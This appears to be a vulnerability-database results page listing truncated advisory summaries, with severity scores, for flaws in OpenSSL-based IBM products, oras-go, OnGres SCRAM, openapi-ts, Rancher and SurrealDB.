Lucene search
K

389099 matches found

IBM Security Bulletins
IBM Security Bulletins
added yesterday2 views

Security Bulletin: Due to the use of OpenSSL, IBM EntireX is vulnerable to multiple vulnerabilities

Summary Due to the use of OpenSSL, IBM EntireX is vulnerable to multiple vulnerabilities CVE-2026-7383, CVE-2026-9076, CVE-2026-34180, CVE-2026-34182, CVE-2026-42766, CVE-2026-42770, CVE-2026-45445, CVE-2026-45446, CVE-2026-45447. To address the vulnerabilities, the version of OpenSSL used by IBM...

9.1CVSS7.9AI score0.02719EPSS
Exploits0Affected Software1
GithubExploit
GithubExploit
added yesterday14 views

bugspray

🔴 Bugspray Multi-vector web application vulnerability scann...

5.8AI score
Exploits0
IBM Security Bulletins
IBM Security Bulletins
added yesterday2 views

Security Bulletin: IBM MQ for HPE NonStop is affected by vulnerabilities in OpenSSL

Summary IBM MQ for HPE NonStop is affected by OpenSSL vulnerabilities CVE-2026-28387, CVE-2026-28388, CVE-2026-28389, CVE-2026-28390, CVE-2026-31789, CVE-2026-31790, CVE-2026-2673. Vulnerability Details CVEID:CVE-2026-28387 DESCRIPTION: Issue summary: An uncommon configuration of clients performi...

9.8CVSS8AI score0.00981EPSS
Exploits0Affected Software1
OSV
OSV
added yesterday2 views

GHSA-P9JG-FCR6-3MHF OnGres SCRAM silent channel-binding authentication downgrade via unsupported certificate algorithms

Summary A flaw in com.ongres.scram:scram-client allows an attacker capable of performing a TLS man-in-the-middle MITM attack to silently downgrade a connection from SCRAM-SHA-256-PLUS with channel binding to standard SCRAM-SHA-256 without channel binding, bypassing strict client-side enforcement...

8.2CVSS5.8AI score
Exploits0References2
Github Security Blog
Github Security Blog
added yesterday2 views

OnGres SCRAM silent channel-binding authentication downgrade via unsupported certificate algorithms

Summary A flaw in com.ongres.scram:scram-client allows an attacker capable of performing a TLS man-in-the-middle MITM attack to silently downgrade a connection from SCRAM-SHA-256-PLUS with channel binding to standard SCRAM-SHA-256 without channel binding, bypassing strict client-side enforcement...

5.8AI score
Exploits0References2Affected Software2
OSV
OSV
added yesterday3 views

GHSA-8XWF-RJM4-XVHV oras-go has file store write outside workingDir via symlink traversal

The file content store in oras-go attempts to confine writes to workingDir when AllowPathTraversalOnWrite=false, but the guard is lexical and does not account for symlink traversal. If workingDir contains a symlink path component and an attacker-controlled blob title via ocispec.AnnotationTitle...

6.9CVSS5.7AI score
Exploits0References3
Github Security Blog
Github Security Blog
added yesterday3 views

oras-go has file store write outside workingDir via symlink traversal

The file content store in oras-go attempts to confine writes to workingDir when AllowPathTraversalOnWrite=false, but the guard is lexical and does not account for symlink traversal. If workingDir contains a symlink path component and an attacker-controlled blob title via ocispec.AnnotationTitle...

5.7AI score
Exploits0References3Affected Software1
OSV
OSV
added yesterday2 views

GHSA-JXPM-75MH-9FP7 oras-go blob upload vulnerable to credential forwarding via unvalidated Location header

Summary oras-go follows a registry-controlled Location header during the monolithic blob upload flow and reuses the Authorization header from the initial POST request for the subsequent PUT request. If a malicious registry returns a cross-host Location, oras-go can send the caller's credentials t...

7.5CVSS5.8AI score
Exploits0References5
Github Security Blog
Github Security Blog
added yesterday2 views

oras-go blob upload vulnerable to credential forwarding via unvalidated Location header

Summary oras-go follows a registry-controlled Location header during the monolithic blob upload flow and reuses the Authorization header from the initial POST request for the subsequent PUT request. If a malicious registry returns a cross-host Location, oras-go can send the caller's credentials t...

5.8AI score
Exploits0References5Affected Software1
OSV
OSV
added yesterday2 views

GHSA-XF85-363P-868W oras-go: Malicious registry can hijack Bearer token realm to exfiltrate credentials and refresh tokens

Summary oras-go's auth.Client follows the realm URL from a registry's WWW-Authenticate: Bearer challenge without validating its scheme or host. The realm field is server-controlled by design in the OCI/distribution spec — registries legitimately point token requests at a separate auth endpoint e....

2.1CVSS5.9AI score
Exploits0References4
Github Security Blog
Github Security Blog
added yesterday2 views

oras-go: Malicious registry can hijack Bearer token realm to exfiltrate credentials and refresh tokens

Summary oras-go's auth.Client follows the realm URL from a registry's WWW-Authenticate: Bearer challenge without validating its scheme or host. The realm field is server-controlled by design in the OCI/distribution spec — registries legitimately point token requests at a separate auth endpoint e....

5.9AI score
Exploits0References4Affected Software2
GithubExploit
GithubExploit
added yesterday17 views

CVE-PoC-Hub

🔬 CVE-PoC-Hub — Curated Proof-of-Concept Exploits Working,...

5.8AI score
Exploits0
OSV
OSV
added yesterday2 views

GHSA-HHX9-57XQ-R5RW @hey-api/openapi-ts's `buildClientParams` template: prototype chain substitution via unknown `$<slot>___proto__` key

Summary dist/clients/core/params.ts in @hey-api/openapi-ts ships a runtime template that is copied verbatim into every generated SDK as params.gen.ts. When a caller passes an object argument containing an unknown key starting with a slot prefix $body, $headers, $path, $query, the function strips...

4.8CVSS5.9AI score
Exploits0References2
Github Security Blog
Github Security Blog
added yesterday2 views

@hey-api/openapi-ts's `buildClientParams` template: prototype chain substitution via unknown `$<slot>___proto__` key

Summary dist/clients/core/params.ts in @hey-api/openapi-ts ships a runtime template that is copied verbatim into every generated SDK as params.gen.ts. When a caller passes an object argument containing an unknown key starting with a slot prefix $body, $headers, $path, $query, the function strips...

5.9AI score
Exploits0References2Affected Software1
EUVD
EUVD
added yesterday9 views

EUVD-2026-38009

Rancher vulnerable to command injection through unsanitized YAML parameter...

9.4CVSS5.8AI score0.01113EPSS
Exploits0References3
OSV
OSV
added yesterday2 views

GHSA-MHC6-2GFQ-XX62 Rancher vulnerable to command injection through unsanitized YAML parameter

Impact A critical command injection vulnerability has been identified in the Rancher Manager cluster import endpoint /v3/import/tokenclusterId.yaml through unsanitized YAML parameters. This endpoint accepts an authImage query parameter that is rendered without sanitization into a generated...

9.6CVSS6.2AI score0.01113EPSS
Exploits0References4
Github Security Blog
Github Security Blog
added yesterday3 views

Rancher vulnerable to command injection through unsanitized YAML parameter

Impact A critical command injection vulnerability has been identified in the Rancher Manager cluster import endpoint /v3/import/tokenclusterId.yaml through unsanitized YAML parameters. This endpoint accepts an authImage query parameter that is rendered without sanitization into a generated...

9.4CVSS6.2AI score0.01113EPSS
Exploits0References4Affected Software1
OSV
OSV
added yesterday2 views

GHSA-6WQW-VHFR-9999 SurrealDB: Authenticated subscribers can read records hidden by SELECT permissions via LIVE subscriptions

A record user could read records the table's SELECT permission expression should have hidden, when that expression referenced $value, $before, $after, or $event. Binding a chosen value to that name before registering a LIVE SELECT caused notifications to evaluate the permission against the...

4.3CVSS5.8AI score
Exploits0References4
Github Security Blog
Github Security Blog
added yesterday2 views

SurrealDB: Authenticated subscribers can read records hidden by SELECT permissions via LIVE subscriptions

A record user could read records the table's SELECT permission expression should have hidden, when that expression referenced $value, $before, $after, or $event. Binding a chosen value to that name before registering a LIVE SELECT caused notifications to evaluate the permission against the...

5.8AI score
Exploits0References4Affected Software1
OSV
OSV
added yesterday2 views

GHSA-4V76-CW68-4VC9 SurrealDB: Crafting malicious LIVE queries writes to the database, resulting in DoS, without permission to the table required

A LIVE query whose WHERE clause evaluates to an error caused the source data modifier the user creating, updating, or deleting a record on the watched table to fail instead. Calling any arbitrary SurrealQL function with a typed parameter and passing a value of the wrong type — for example LIVE...

6.5CVSS5.9AI score
Exploits0References4
Rows per page
Query Builder